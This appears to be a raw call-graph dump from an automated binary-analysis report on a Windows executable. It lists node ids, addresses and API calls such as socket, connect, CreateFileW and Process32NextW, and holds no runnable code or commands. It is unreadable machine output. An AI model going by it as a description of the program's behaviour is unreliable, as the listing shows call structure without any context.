86367->86266 86915 40c650 86368->86915 86371 458a1c WSAGetLastError 86373 458a31 86371->86373 86372 458a49 86918 4530c9 VariantClear 86372->86918 86917 4530c9 VariantClear 86373->86917 86375 458a5a 86375->86266 86377 458a42 86377->86266 86919 471f53 86378->86919 86380 47b1eb 86930 46f3c1 86380->86930 86382 47b1f3 86383 408f40 VariantClear 86382->86383 86384 47b212 86382->86384 86383->86384 86384->86266 87018 46e785 86385->87018 86387 46e92f 86387->86266 86389 45340c 85 API calls 86388->86389 86390 45a40f SetWindowTextW 86389->86390 86390->86266 86392 45340c 85 API calls 86391->86392 86393 45c90d 86392->86393 87161 4339fa 86393->87161 86396 45c923 86396->86266 86397 408f40 VariantClear 86397->86396 86399 45340c 85 API calls 86398->86399 86400 457e61 86399->86400 86401 443d19 67 API calls 86400->86401 86402 457e67 86401->86402 86403 457e71 86402->86403 86404 457e9d 86402->86404 86405 408f40 VariantClear 86403->86405 86406 408f40 VariantClear 86404->86406 86407 457e76 86405->86407 86408 457ea2 86406->86408 86407->86266 86408->86266 86410 45340c 85 API calls 86409->86410 86411 46cf16 86410->86411 86412 40bc70 52 API calls 86411->86412 86413 46cf23 86412->86413 86414 40bc70 52 API calls 86413->86414 86415 46cf41 86414->86415 86416 40e710 53 API calls 86415->86416 86417 46cf58 86416->86417 86418 46cf70 _wcslen 86417->86418 86419 46cf61 OleInitialize 86417->86419 86420 46cf85 86418->86420 86421 46d0f2 86418->86421 86419->86418 86422 4339fa 3 API calls 86420->86422 86423 46d119 GetActiveObject 86421->86423 86425 45340c 85 API calls 86421->86425 86424 46cf8b 86422->86424 86426 46d133 86423->86426 86427 46d029 86423->86427 86428 46d018 CreateBindCtx 86424->86428 86431 402160 52 API calls 86424->86431 86429 46d10a CLSIDFromProgID 86425->86429 86426->86427 86436 46d170 86426->86436 87173 451b42 61 API calls 86427->87173 86428->86427 86432 46d055 MkParseDisplayName 86428->86432 86429->86423 86429->86427 86449 46cf9f 86431->86449 86433 46d06f 86432->86433 86434 46d0dc 
86432->86434 86439 46d0a7 86433->86439 87174 451b42 61 API calls 86433->87174 87176 451b42 61 API calls 86434->87176 87177 468070 104 API calls ctype 86436->87177 86438 46d036 86438->86266 86447 46d0c7 86439->86447 86443 46cff8 86444 46d014 86443->86444 87172 40bd50 52 API calls 86443->87172 86444->86428 86447->86266 86449->86443 86450 40c600 52 API calls 86449->86450 87169 465177 52 API calls 86449->87169 87170 40bd50 52 API calls 86449->87170 87171 403020 52 API calls _memmove 86449->87171 86450->86449 86452 471f53 86 API calls 86451->86452 86453 47ac84 86452->86453 86454 46f3c1 107 API calls 86453->86454 86455 47ac8c 86454->86455 86456 47acc2 86455->86456 86457 47ac90 86455->86457 86458 40bc70 52 API calls 86456->86458 86459 408f40 VariantClear 86457->86459 86460 47accb 86458->86460 86461 47acab 86459->86461 87178 461383 86460->87178 86461->86266 86463 47acdc 86467 40bc70 52 API calls 86466->86467 86468 46bed3 86467->86468 86469 40bc70 52 API calls 86468->86469 86470 46bedc 86469->86470 86471 40bc70 52 API calls 86470->86471 86472 46bee5 86471->86472 86473 40e710 53 API calls 86472->86473 86474 46bef2 86473->86474 86475 45340c 85 API calls 86474->86475 86476 46bf00 86475->86476 86477 401b10 52 API calls 86476->86477 86478 46bf0c 86477->86478 87198 463980 86478->87198 86540 40e710 53 API calls 86539->86540 86541 46f9ba 86540->86541 86542 4115d7 52 API calls 86541->86542 86549 46fa26 86541->86549 86543 46f9d3 86542->86543 86545 46f9df 86543->86545 87253 40da60 53 API calls 86543->87253 86544 46fa38 86544->86266 86547 4533eb 85 API calls 86545->86547 86548 46f9f0 86547->86548 86551 40de40 60 API calls 86548->86551 86549->86544 86553 46fa7a 86549->86553 87239 44c285 86549->87239 86552 46f9fd 86551->86552 86552->86549 86558 46fa01 86552->86558 86554 46fb17 86553->86554 86555 46fa99 86553->86555 86557 40bc70 52 API calls 86554->86557 86556 4115d7 52 API calls 86555->86556 86559 46fa9f 86556->86559 86560 46fb20 86557->86560 86561 46fa0b 86558->86561 86564 44ae3e 
CloseHandle 86558->86564 86562 46fab6 86559->86562 87254 443ee5 ReadFile SetFilePointerEx 86559->87254 87242 46ea94 86560->87242 86561->86266 86573 46faba ctype 86562->86573 87255 453132 53 API calls __cftof2_l 86562->87255 86564->86561 86566 46fb30 86566->86573 87256 40e6a0 53 API calls 86566->87256 86568 46faea _memmove 86571 403cd0 VariantClear 86568->86571 86570 46fb52 86572 403cd0 VariantClear 86570->86572 86571->86573 86572->86573 86574 46fb99 86573->86574 86575 40da20 CloseHandle 86573->86575 86574->86266 86576 46fb8b 86575->86576 86577 44ae3e CloseHandle 86576->86577 86577->86574 86579 40d3c4 86578->86579 86580 40d3cc timeGetTime 86579->86580 86581 42e19d Sleep 86579->86581 86582 40d3e2 86580->86582 86583 4091e0 385 API calls 86582->86583 86584 40d3fb 86583->86584 86584->86266 86586 4678bb 86585->86586 86587 467947 86586->86587 86590 45340c 85 API calls 86586->86590 86588 4115d7 52 API calls 86587->86588 86616 467964 86587->86616 86589 467989 86588->86589 86591 467995 86589->86591 87323 40da60 53 API calls 86589->87323 86592 4678f6 86590->86592 86595 4533eb 85 API calls 86591->86595 86594 413a0e __wsplitpath 46 API calls 86592->86594 86596 4678fc 86594->86596 86597 4679b7 86595->86597 86598 401b10 52 API calls 86596->86598 86599 40de40 60 API calls 86597->86599 86600 46790c 86598->86600 86601 4679c3 86599->86601 87322 40d200 52 API calls 2 library calls 86600->87322 86603 4679c7 GetLastError 86601->86603 86604 467a05 86601->86604 86606 403cd0 VariantClear 86603->86606 86607 467a2c 86604->86607 86608 467a4b 86604->86608 86605 467917 86605->86587 86610 4339fa 3 API calls 86605->86610 86609 4679dc 86606->86609 86611 4115d7 52 API calls 86607->86611 86612 4115d7 52 API calls 86608->86612 86613 4679e6 86609->86613 86619 44ae3e CloseHandle 86609->86619 86614 467928 86610->86614 86617 467a31 86611->86617 86618 467a49 86612->86618 86615 408f40 VariantClear 86613->86615 86614->86587 86620 4335cd 56 API calls 86614->86620 86621 4679ed 86615->86621 86616->86266 87324 
436299 52 API calls 2 library calls 86617->87324 86623 408f40 VariantClear 86618->86623 86619->86613 86624 467939 86620->86624 86621->86266 86625 467a88 86623->86625 86624->86587 86626 408f40 VariantClear 86624->86626 86625->86266 86626->86587 87325 43137e 86627->87325 86629 476db9 86630 476dd2 86629->86630 86631 476e2d 86629->86631 87330 40e830 53 API calls 86630->87330 86636 476e7a 86631->86636 86641 408f40 VariantClear 86631->86641 86633 476de0 87331 40cf00 53 API calls 86633->87331 86635 476deb 86637 408f40 VariantClear 86635->86637 86636->86266 86638 476df8 86637->86638 87332 40cf00 53 API calls 86638->87332 86640 476e0c 86643 408f40 VariantClear 86640->86643 86642 476e43 86641->86642 86642->86266 86644 476e19 86643->86644 86644->86266 86646 4653e2 86645->86646 86647 4533eb 85 API calls 86646->86647 86648 4653e9 86647->86648 87333 465225 86648->87333 86650 4653f4 86651 4653f8 socket 86650->86651 86655 465420 86650->86655 86652 46543f connect 86651->86652 86653 46540b WSAGetLastError 86651->86653 86657 465450 86652->86657 86658 46546b WSAGetLastError 86652->86658 86653->86655 86654 408f40 VariantClear 86656 465428 86654->86656 86655->86654 86656->86266 86659 408f40 VariantClear 86657->86659 87339 403c90 86658->87339 86661 465458 86659->86661 86661->86266 86662 465480 closesocket 86662->86655 86664 4589dd 86663->86664 87342 4530c9 VariantClear 86664->87342 86666 4589f4 86666->86266 86720 4533eb 86667->86720 86670 4750ee 86673 408f40 VariantClear 86670->86673 86671 475129 86724 4646e0 86671->86724 86678 4750f5 86673->86678 86674 47515e 86675 475162 86674->86675 86713 47518e 86674->86713 86676 408f40 VariantClear 86675->86676 86707 475169 86676->86707 86677 475357 86679 475365 86677->86679 86680 4754ea 86677->86680 86678->86300 86758 44b3ac 57 API calls 86679->86758 86765 464812 92 API calls 86680->86765 86686 4533eb 85 API calls 86686->86713 86695 475480 86697 408f40 VariantClear 86695->86697 86697->86707 86705 4754b5 86706 408f40 VariantClear 86705->86706 
86706->86707 86707->86300 86713->86677 86713->86686 86713->86695 86713->86705 86713->86713 86756 436299 52 API calls 2 library calls 86713->86756 86757 463ad5 64 API calls __wcsicoll 86713->86757 86721 453404 86720->86721 86722 4533f8 86720->86722 86721->86670 86721->86671 86722->86721 86768 4531b1 85 API calls 5 library calls 86722->86768 86769 4536f7 53 API calls 86724->86769 86726 4646fc 86770 4426cd 59 API calls _wcslen 86726->86770 86728 464711 86730 40bc70 52 API calls 86728->86730 86736 46474b 86728->86736 86731 46472c 86730->86731 86771 461465 86731->86771 86735 464793 86735->86674 86736->86735 86784 463ad5 64 API calls __wcsicoll 86736->86784 86756->86713 86757->86713 86768->86721 86769->86726 86770->86728 86772 4614cf 86771->86772 86773 461478 86771->86773 86774 40c600 52 API calls 86772->86774 86773->86772 86776 461482 86773->86776 86775 4614da 86774->86775 86777 4614e1 86776->86777 86778 46149c 86776->86778 86784->86735 86796 4335eb _wcslen 86795->86796 86797 433615 GetFileAttributesW 86796->86797 86798 433649 86797->86798 86799 43362b GetLastError 86797->86799 86798->86305 86800 433636 CreateDirectoryW 86799->86800 86801 43364f 86799->86801 86800->86798 86800->86801 86801->86798 86809 410160 86801->86809 86803 433661 _wcsrchr 86804 433672 ctype 86803->86804 86805 4335cd 52 API calls 86803->86805 86804->86305 86806 43368f ctype 86805->86806 86807 4336b2 86806->86807 86808 43369e CreateDirectoryW 86806->86808 86807->86305 86808->86807 86810 410167 _wcslen 86809->86810 86811 4115d7 52 API calls 86810->86811 86812 41017e _wcscpy 86811->86812 86812->86803 86814 4115d7 52 API calls 86813->86814 86815 40d385 86814->86815 86816 4115d7 52 API calls 86815->86816 86817 40d391 86816->86817 86817->86311 86819 45f66d 86818->86819 86820 45f67c 86818->86820 86854 444d96 86819->86854 86821 4115d7 52 API calls 86820->86821 86823 45f683 WideCharToMultiByte 86821->86823 86841 45412d 86823->86841 86842 454177 86841->86842 86844 454140 86841->86844 86865 44c8cd 52 API calls 
_memmove 86842->86865 86844->86842 86846 454149 86844->86846 86845 45417d 86847 454184 86846->86847 86848 454153 86846->86848 86855 444da3 86854->86855 86856 444dc0 86855->86856 86866 434a13 52 API calls 86855->86866 86856->86314 86858 444db2 86859 4115d7 52 API calls 86858->86859 86859->86856 86865->86845 86866->86858 86868 468100 86867->86868 86869 4680fa 86867->86869 86868->86330 86871 467ac4 55 API calls 2 library calls 86869->86871 86871->86868 86873 44ae4b ctype 86872->86873 86875 443fdf 86872->86875 86873->86352 86880 40da20 86875->86880 86877 443feb 86884 4340db CloseHandle ctype 86877->86884 86879 444001 86879->86873 86881 40da37 86880->86881 86882 40da29 86880->86882 86881->86882 86883 40da3c CloseHandle 86881->86883 86882->86877 86883->86877 86884->86879 86886 433a32 86885->86886 86887 433a3a 86885->86887 86886->86361 86888 4115d7 52 API calls 86887->86888 86889 433a41 GetFileVersionInfoW 86888->86889 86890 433a5a _wcslen 86889->86890 86891 4115d7 52 API calls 86890->86891 86895 433a73 _wcscat _wcscpy 86891->86895 86894 433b68 VerQueryValueW 86896 433ab3 VerQueryValueW 86895->86896 86901 433acb _wcscat 86895->86901 86896->86901 86900 433b3b ctype _wcsncpy 86900->86361 86903 4114ab 86901->86903 86904 411523 86903->86904 86905 4114ba 86903->86905 86914 4113a8 58 API calls 3 library calls 86904->86914 86910 4114d1 86905->86910 86912 417f77 46 API calls __getptd_noexit 86905->86912 86908 4114c6 86910->86894 86910->86900 86912->86908 86914->86910 86916 40c662 closesocket 86915->86916 86916->86371 86916->86372 86917->86377 86918->86375 86946 408e80 VariantClear 86919->86946 86921 471f70 86922 471f76 86921->86922 86923 471f95 86921->86923 86924 4533eb 85 API calls 86922->86924 86925 402160 52 API calls 86923->86925 86926 471f82 86924->86926 86927 471fa5 86925->86927 86928 40e0a0 52 API calls 86926->86928 86927->86380 86929 471f8e 86928->86929 86929->86380 86931 46f3d5 86930->86931 86932 46f3e6 86931->86932 86935 46f427 86931->86935 86998 44b3ac 57 API calls 
86932->86998 86934 46f3eb IsWindow 86936 46f41e 86934->86936 86937 46f3fb 86934->86937 86935->86936 86938 4533eb 85 API calls 86935->86938 86936->86382 86999 44cdaf 86937->86999 86940 46f459 86938->86940 86947 46ed8e 86940->86947 86946->86921 86948 46eda2 86947->86948 86949 40e0a0 52 API calls 86948->86949 86950 46edd0 86949->86950 86998->86934 87000 44cdbc 86999->87000 87019 46e7a2 87018->87019 87020 4115d7 52 API calls 87019->87020 87023 46e802 87019->87023 87021 46e7ad 87020->87021 87022 46e7b9 87021->87022 87079 40da60 53 API calls 87021->87079 87028 4533eb 85 API calls 87022->87028 87024 46e7e5 87023->87024 87031 46e82f 87023->87031 87025 408f40 VariantClear 87024->87025 87027 46e7ea 87025->87027 87027->86387 87029 46e7ca 87028->87029 87080 40de40 87029->87080 87030 46e8b5 87033 4680ed 55 API calls 87030->87033 87031->87030 87034 46e845 87031->87034 87036 46e8bb 87033->87036 87037 4533eb 85 API calls 87034->87037 87094 443fbe SetFilePointerEx SetFilePointerEx WriteFile 87036->87094 87046 46e84b 87037->87046 87039 46e87a 87059 4689f4 87039->87059 87043 46e883 87092 4013c0 52 API calls 87043->87092 87044 46e8d4 87048 408f40 VariantClear 87044->87048 87058 46e881 87044->87058 87046->87039 87046->87043 87047 46e88f 87049 40e0a0 52 API calls 87047->87049 87048->87058 87050 46e899 87049->87050 87093 40d200 52 API calls 2 library calls 87050->87093 87052 46e911 87052->86387 87053 40da20 CloseHandle 87055 46e903 87053->87055 87054 46e8a5 87056 4689f4 59 API calls 87054->87056 87057 44ae3e CloseHandle 87055->87057 87056->87058 87057->87052 87058->87052 87058->87053 87060 468a1a 87059->87060 87061 468a0a 87059->87061 87063 468a2e 87060->87063 87064 468a1e 87060->87064 87098 443f76 SetFilePointerEx SetFilePointerEx WriteFile 87061->87098 87067 468a44 87063->87067 87068 468a35 87063->87068 87099 443f0a 55 API calls ctype 87064->87099 87065 468a11 87065->87058 87069 40d370 52 API calls 87067->87069 87071 40d370 52 API calls 87068->87071 87072 468a49 87069->87072 87070 
468a25 87070->87058 87073 468a3a 87071->87073 87074 45f645 54 API calls 87072->87074 87100 4541a8 54 API calls ctype 87073->87100 87076 468a41 87074->87076 87079->87022 87081 40da20 CloseHandle 87080->87081 87082 40de4e 87081->87082 87108 40f110 87082->87108 87085 4264fa 87092->87047 87093->87054 87094->87044 87098->87065 87099->87070 87100->87076 87109 40f125 CreateFileW 87108->87109 87110 42630c 87108->87110 87111 40de74 87109->87111 87110->87111 87112 426311 CreateFileW 87110->87112 87111->87085 87115 40dea0 87111->87115 87112->87111 87113 426337 87112->87113 87137 40df90 87113->87137 87116 40debc 87115->87116 87125 40df1c 87115->87125 87116->87125 87164 4339b6 GetFileAttributesW 87161->87164 87163 433a06 87163->86396 87163->86397 87165 4339d2 FindFirstFileW 87164->87165 87166 4339f5 87164->87166 87167 4339e3 87165->87167 87168 4339ea FindClose 87165->87168 87166->87163 87167->87163 87168->87166 87169->86449 87170->86449 87171->86449 87172->86444 87173->86438 87174->86439 87176->86447 87177->86447 87179 402160 52 API calls 87178->87179 87180 461395 87179->87180 87194 436458 87180->87194 87183 4613a2 SendMessageW 87184 4613b8 87183->87184 87185 4115d7 52 API calls 87184->87185 87192 461405 ctype 87192->86463 87197 436327 SendMessageTimeoutW 87194->87197 87196 436466 87196->87183 87196->87192 87197->87196 87199 402160 52 API calls 87198->87199 87200 463993 87199->87200 87201 402160 52 API calls 87200->87201 87240 443d73 2 API calls 87239->87240 87241 44c292 87240->87241 87241->86553 87243 46eac5 87242->87243 87244 46eaac 87242->87244 87273 45f72f 54 API calls 87243->87273 87245 46eab1 87244->87245 87246 46eabb 87244->87246 87257 4689aa 87245->87257 87265 46ea4a 87246->87265 87250 46eaca 87250->86566 87253->86545 87254->86562 87255->86568 87256->86570 87258 40d370 52 API calls 87257->87258 87259 4689b9 87258->87259 87274 44c228 87259->87274 87266 40d370 52 API calls 87265->87266 87267 46ea59 87266->87267 87268 44c228 54 API calls 87267->87268 87269 46ea67 
87268->87269 87273->87250 87275 444d96 52 API calls 87274->87275 87322->86605 87323->86591 87324->86618 87326 4313b1 87325->87326 87327 431394 GetWindowRect 87325->87327 87328 4313c3 87326->87328 87329 4313bb ClientToScreen 87326->87329 87327->86629 87328->86629 87329->87328 87330->86633 87331->86635 87332->86640 87341 45a52f 54 API calls 87333->87341 87335 465246 inet_addr 87336 465259 87335->87336 87337 4652a8 htons 87336->87337 87338 465273 87336->87338 87337->86650 87338->86650 87340 403c9e 87339->87340 87340->86662 87341->87335 87342->86666 87343->86169 87344->86190 87352 433d5f 87345->87352 87347 433fbe CloseHandle 87347->86187 87348 433f30 Process32NextW 87348->87347 87351 433f1f _wcscat 87348->87351 87349 413a0e __wsplitpath 46 API calls 87349->87351 87350 4114ab __wcsicoll 58 API calls 87350->87351 87351->87347 87351->87348 87351->87349 87351->87350 87353 433d8b 87352->87353 87357 433d6e 87352->87357 87360 41319b 57 API calls __wcstoi64 87353->87360 87356 433d91 87356->87351 87357->87353 87358 433d98 87357->87358 87359 4131fc GetStringTypeW wcstoxq 87357->87359 87358->87351 87359->87357 87360->87356 87361->85935 87362->85948 87363->85948 87364->85948 87365->85948 87366->85948 87367->85966 87368->85966 87369->85974 87370->85959 87371->85996 87372->85996 87373->85996 87374->85987 87375->85996 87376->85996 87377 40ad09 87378 40bc10 53 API calls 87377->87378 87379 40ad1f 87378->87379 87381 40ad40 87379->87381 87384 40c1f0 87379->87384 87418 44b92d VariantClear 87381->87418 87383 42bc5b 87385 40c2c0 52 API calls 87384->87385 87386 40c21f 87385->87386 87387 42965b 87386->87387 87388 40c22a 87386->87388 87478 45e737 90 API calls 3 library calls 87387->87478 87390 40c232 87388->87390 87477 40c4e0 387 API calls 87388->87477 87391 40c23e 87390->87391 87396 429673 87390->87396 87393 40c256 87391->87393 87394 4296c7 87391->87394 87476 408e80 VariantClear 87393->87476 87480 45e737 90 API calls 3 library calls 87394->87480 87419 47e250 87396->87419 87399 42969a 87400 
40c27c 87399->87400 87479 45e737 90 API calls 3 library calls 87399->87479 87400->87381 87402 40c25f 87402->87400 87403 429721 87402->87403 87481 457f66 87 API calls __write_nolock 87402->87481 87404 429753 87403->87404 87483 472f47 127 API calls 87403->87483 87485 408e80 VariantClear 87404->87485 87407 429708 87410 45340c 85 API calls 87407->87410 87409 429734 87413 45340c 85 API calls 87409->87413 87414 42970e _wcslen 87410->87414 87411 42975f 87412 408f40 VariantClear 87411->87412 87412->87400 87416 42973d _wcslen 87413->87416 87414->87403 87482 408e80 VariantClear 87414->87482 87416->87404 87484 408e80 VariantClear 87416->87484 87418->87383 87420 40bc70 52 API calls 87419->87420 87421 47e28d 87420->87421 87422 47e2ed 87421->87422 87424 47e2ae 87421->87424 87423 46fe32 VariantClear 87422->87423 87425 47e2f6 87423->87425 87497 408e80 VariantClear 87424->87497 87427 47e305 87425->87427 87428 47e319 87425->87428 87431 402160 52 API calls 87427->87431 87430 40e0a0 52 API calls 87428->87430 87429 47e2ba 87433 408f40 VariantClear 87429->87433 87432 47e315 87430->87432 87431->87432 87435 47e38e 87432->87435 87499 475a67 387 API calls 87432->87499 87434 47e2ca 87433->87434 87436 408f40 VariantClear 87434->87436 87486 47b291 87435->87486 87438 47e2d2 87436->87438 87498 410c60 VariantClear ctype 87438->87498 87439 47e346 87439->87435 87442 47e34a 87439->87442 87500 45e538 90 API calls 3 library calls 87442->87500 87443 47e3b7 87446 47e3ed 87443->87446 87447 47e3bb 87443->87447 87444 47e2da 87448 408f40 VariantClear 87444->87448 87455 47e48e 87446->87455 87502 408e80 VariantClear 87446->87502 87449 40e710 53 API calls 87447->87449 87450 47e2e2 87448->87450 87451 47e3c8 87449->87451 87450->87399 87452 40e710 53 API calls 87451->87452 87454 47e358 87452->87454 87453 408f40 VariantClear 87456 47e368 87453->87456 87454->87453 87458 47e250 387 API calls 87455->87458 87459 408f40 VariantClear 87456->87459 87462 47e4ae 87458->87462 87463 47e370 87459->87463 87460 47e481 87461 
40e710 53 API calls 87460->87461 87461->87455 87467 408f40 VariantClear 87462->87467 87501 410c60 VariantClear ctype 87463->87501 87465 47e378 87466 408f40 VariantClear 87465->87466 87468 47e380 87466->87468 87469 47e4c0 87467->87469 87468->87399 87470 408f40 VariantClear 87469->87470 87471 47e4c8 87470->87471 87503 410c60 VariantClear ctype 87471->87503 87473 47e4d0 87474 408f40 VariantClear 87473->87474 87475 47e4d8 87474->87475 87475->87399 87476->87402 87477->87390 87478->87396 87479->87400 87480->87400 87481->87407 87482->87403 87483->87409 87484->87404 87485->87411 87487 47b2e7 87486->87487 87488 47b2a5 87486->87488 87487->87443 87489 40e710 53 API calls 87488->87489 87490 47b2af 87489->87490 87491 47b2b7 87490->87491 87492 47b2cf 87490->87492 87504 47974b 87491->87504 87494 47974b 144 API calls 87492->87494 87496 47b2df 87494->87496 87495 47b2c7 87495->87443 87496->87443 87497->87429 87498->87444 87499->87439 87500->87454 87501->87465 87502->87460 87503->87473 87505 479786 87504->87505 87506 479aed 87504->87506 87505->87506 87508 479798 87505->87508 87568 451b42 61 API calls 87506->87568 87510 4797a2 87508->87510 87511 4797be 87508->87511 87509 479b00 87509->87495 87560 451b42 61 API calls 87510->87560 87513 4797c7 87511->87513 87514 4797e3 87511->87514 87561 451b42 61 API calls 87513->87561 87544 441eba 87514->87544 87516 4797b5 87516->87495 87518 4797f7 87520 479815 87518->87520 87521 4797fe 87518->87521 87519 4797da 87519->87495 87525 47983c 87520->87525 87549 451d2b 87520->87549 87562 451b42 61 API calls 87521->87562 87523 47980c 87523->87495 87529 4798e6 87525->87529 87563 479714 110 API calls 87525->87563 87526 47994b VariantInit 87533 479980 __cftof2_l 87526->87533 87529->87526 87530 479916 VariantClear 87529->87530 87530->87529 87531 479a44 87566 468070 104 API calls ctype 87531->87566 87532 479a0b 87534 479a2c 87532->87534 87535 479a12 87532->87535 87533->87531 87533->87532 87533->87534 87565 451b42 61 API calls 87534->87565 87564 451b42 61 API 
calls 87535->87564 87539 479a24 87540 479aca VariantClear 87539->87540 87541 479adb 87540->87541 87541->87495 87542 479a50 87542->87540 87567 468070 104 API calls ctype 87542->87567 87545 441f12 87544->87545 87546 441ecc _wcslen 87544->87546 87545->87518 87546->87545 87547 410160 52 API calls 87546->87547 87548 441ede 87547->87548 87548->87518 87552 451d5e 87549->87552 87550 451e93 SysFreeString 87553 451ea0 87550->87553 87551 451f21 87551->87553 87554 451f6d lstrcmpiW 87551->87554 87555 451f7f SysFreeString 87551->87555 87558 451fab 87551->87558 87552->87550 87552->87551 87552->87553 87559 451d68 87552->87559 87553->87559 87569 44a545 RaiseException 87553->87569 87554->87555 87557 451fc7 SysFreeString 87554->87557 87555->87551 87557->87553 87558->87525 87559->87525 87560->87516 87561->87519 87562->87523 87563->87525 87564->87539 87565->87539 87566->87542 87567->87542 87568->87509 87569->87553 87570 425b2b 87575 40f000 87570->87575 87574 425b3a 87576 4115d7 52 API calls 87575->87576 87577 40f007 87576->87577 87578 4276ea 87577->87578 87584 40f030 87577->87584 87583 41130a 51 API calls __cinit 87583->87574 87585 40f039 87584->87585 87586 40f01a 87584->87586 87614 41130a 51 API calls __cinit 87585->87614 87588 40e500 87586->87588 87589 40bc70 52 API calls 87588->87589 87590 40e515 GetVersionExW 87589->87590 87591 402160 52 API calls 87590->87591 87592 40e557 87591->87592 87615 40e660 87592->87615 87595 40e680 52 API calls 87597 40e566 87595->87597 87598 427674 87597->87598 87620 40ef60 87597->87620 87602 4276c6 GetSystemInfo 87598->87602 87600 40e5e0 87604 4276d5 GetSystemInfo 87600->87604 87624 40efd0 87600->87624 87601 40e5cd GetCurrentProcess 87631 40ef20 LoadLibraryA GetProcAddress 87601->87631 87602->87604 87607 40e629 87628 40ef90 87607->87628 87610 40e641 FreeLibrary 87611 40e644 87610->87611 87612 40e653 FreeLibrary 87611->87612 87613 40e656 87611->87613 87612->87613 87613->87583 87614->87586 87616 40e667 87615->87616 87617 42761d 87616->87617 87618 40c600 52 
API calls 87616->87618 87619 40e55c 87618->87619 87619->87595 87621 40e5c8 87620->87621 87622 40ef66 LoadLibraryA 87620->87622 87621->87600 87621->87601 87622->87621 87623 40ef77 GetProcAddress 87622->87623 87623->87621 87625 40e620 87624->87625 87626 40efd6 LoadLibraryA 87624->87626 87625->87602 87625->87607 87626->87625 87627 40efe7 GetProcAddress 87626->87627 87627->87625 87632 40efb0 LoadLibraryA GetProcAddress 87628->87632 87630 40e632 GetNativeSystemInfo 87630->87610 87630->87611 87631->87600 87632->87630 87633 40b2cd 87636 40bf20 87633->87636 87637 40bf39 87636->87637 87638 42bdba 87637->87638 87639 40bf78 87637->87639 87765 45e737 90 API calls 3 library calls 87638->87765 87641 40c2c0 52 API calls 87639->87641 87642 40bfa8 87641->87642 87644 408f40 VariantClear 87642->87644 87649 40bfe8 87642->87649 87643 408f40 VariantClear 87645 42c185 87643->87645 87647 40bfbb 87644->87647 87650 408f40 VariantClear 87645->87650 87646 40bff5 87651 42be23 87646->87651 87652 40c00c 87646->87652 87664 42bdcd 87646->87664 87648 401980 53 API calls 87647->87648 87653 40bfd6 87648->87653 87649->87646 87670 40c1dd 87649->87670 87766 40c4e0 387 API calls 87649->87766 87655 42c18d 87650->87655 87704 40c07f 87651->87704 87767 45e737 90 API calls 3 library calls 87651->87767 87656 40a780 387 API calls 87652->87656 87658 40c2c0 52 API calls 87653->87658 87778 452670 VariantClear 87655->87778 87660 40c022 87656->87660 87658->87649 87660->87664 87760 408e80 VariantClear 87660->87760 87662 40a780 387 API calls 87662->87704 87663 42c196 87663->87663 87664->87643 87666 40c035 87669 40a780 387 API calls 87666->87669 87666->87670 87671 40c06b 87669->87671 87777 45e737 90 API calls 3 library calls 87670->87777 87671->87664 87761 408e80 VariantClear 87671->87761 87673 452670 VariantClear 87673->87704 87674 452f05 VariantClear 87674->87704 87675 40cf00 53 API calls 87675->87704 87677 408e80 VariantClear 87677->87704 87678 40c147 87680 40c151 87678->87680 87681 42c0df 87678->87681 87679 408f40 
VariantClear 87679->87704 87682 408f40 VariantClear 87680->87682 87683 408f40 VariantClear 87681->87683 87684 40c159 87682->87684 87685 42c0f2 87683->87685 87762 40c670 88 API calls 87684->87762 87774 40ceb0 53 API calls 87685->87774 87688 42c111 87775 467c5c 88 API calls 87688->87775 87689 40c16d 87689->87688 87763 40c670 88 API calls 87689->87763 87693 42c134 87693->87670 87776 40ceb0 53 API calls 87693->87776 87694 40c180 87694->87688 87695 40c188 87694->87695 87764 40ceb0 53 API calls 87695->87764 87697 42c0bc 87771 408e80 VariantClear 87697->87771 87699 40c199 87705 408f40 VariantClear 87699->87705 87701 40e710 53 API calls 87701->87704 87702 42c0c5 87772 408e80 VariantClear 87702->87772 87704->87662 87704->87664 87704->87670 87704->87673 87704->87674 87704->87675 87704->87677 87704->87678 87704->87679 87704->87681 87704->87697 87704->87701 87715 46c84c 87704->87715 87768 45e951 53 API calls 87704->87768 87769 451b42 61 API calls 87704->87769 87770 45e737 90 API calls 3 library calls 87704->87770 87707 40c1af 87705->87707 87706 42c0d1 87773 40ceb0 53 API calls 87706->87773 87709 408f40 VariantClear 87707->87709 87710 40c1b7 87709->87710 87711 408f40 VariantClear 87710->87711 87712 40c1bf 87711->87712 87713 408f40 VariantClear 87712->87713 87714 40b2d8 87713->87714 87719 46c8a3 __cftof2_l 87715->87719 87716 46ca96 87788 451b42 61 API calls 87716->87788 87718 46cb56 87718->87704 87719->87716 87720 46ca4a 87719->87720 87723 46ca74 87719->87723 87726 46c8e1 87719->87726 87721 46ca90 87720->87721 87722 46ca58 87720->87722 87721->87716 87727 46caa2 VariantInit VariantClear 87721->87727 87784 451b42 61 API calls 87722->87784 87785 451b42 61 API calls 87723->87785 87730 46c8e8 87726->87730 87736 46c904 87726->87736 87732 46cacb 87727->87732 87728 46ca6b 87728->87704 87729 46ca87 87729->87704 87779 451b42 61 API calls 87730->87779 87734 46cafb 87732->87734 87735 46cad6 87732->87735 87733 46c8fb 87733->87704 87738 46cb05 87734->87738 87739 408f40 VariantClear 
87734->87739 87737 408f40 VariantClear 87735->87737 87742 46c95e VariantInit 87736->87742 87740 46cadb 87737->87740 87787 468070 104 API calls ctype 87738->87787 87739->87738 87786 451b42 61 API calls 87740->87786 87746 46c99c 87742->87746 87744 46caf2 87744->87704 87745 46cb2e VariantClear 87745->87704 87747 46c9ae 87746->87747 87754 46c9e4 87746->87754 87748 46c9d0 87747->87748 87749 46c9b9 87747->87749 87781 451b42 61 API calls 87748->87781 87780 451b42 61 API calls 87749->87780 87752 46c9db 87752->87704 87753 46c9c7 87753->87704 87754->87716 87755 46ca37 87754->87755 87756 46ca1d 87754->87756 87783 468070 104 API calls ctype 87755->87783 87782 451b42 61 API calls 87756->87782 87758 46ca2e 87758->87704 87760->87666 87761->87704 87762->87689 87763->87694 87764->87699 87765->87664 87766->87646 87767->87704 87768->87704 87769->87704 87770->87704 87771->87702 87772->87706 87773->87681 87774->87688 87775->87693 87776->87670 87777->87664 87778->87663 87779->87733 87780->87753 87781->87752 87782->87758 87783->87720 87784->87728 87785->87729 87786->87744 87787->87745 87788->87718 87789 425b6f 87794 40dc90 87789->87794 87793 425b7e 87795 40bc70 52 API calls 87794->87795 87796 40dd03 87795->87796 87802 40f210 87796->87802 87798 40dd96 87800 40ddb7 87798->87800 87805 40dc00 52 API calls 2 library calls 87798->87805 87801 41130a 51 API calls __cinit 87800->87801 87801->87793 87806 40f250 RegOpenKeyExW 87802->87806 87804 40f230 87804->87798 87805->87798 87807 425e17 87806->87807 87808 40f275 RegQueryValueExW 87806->87808 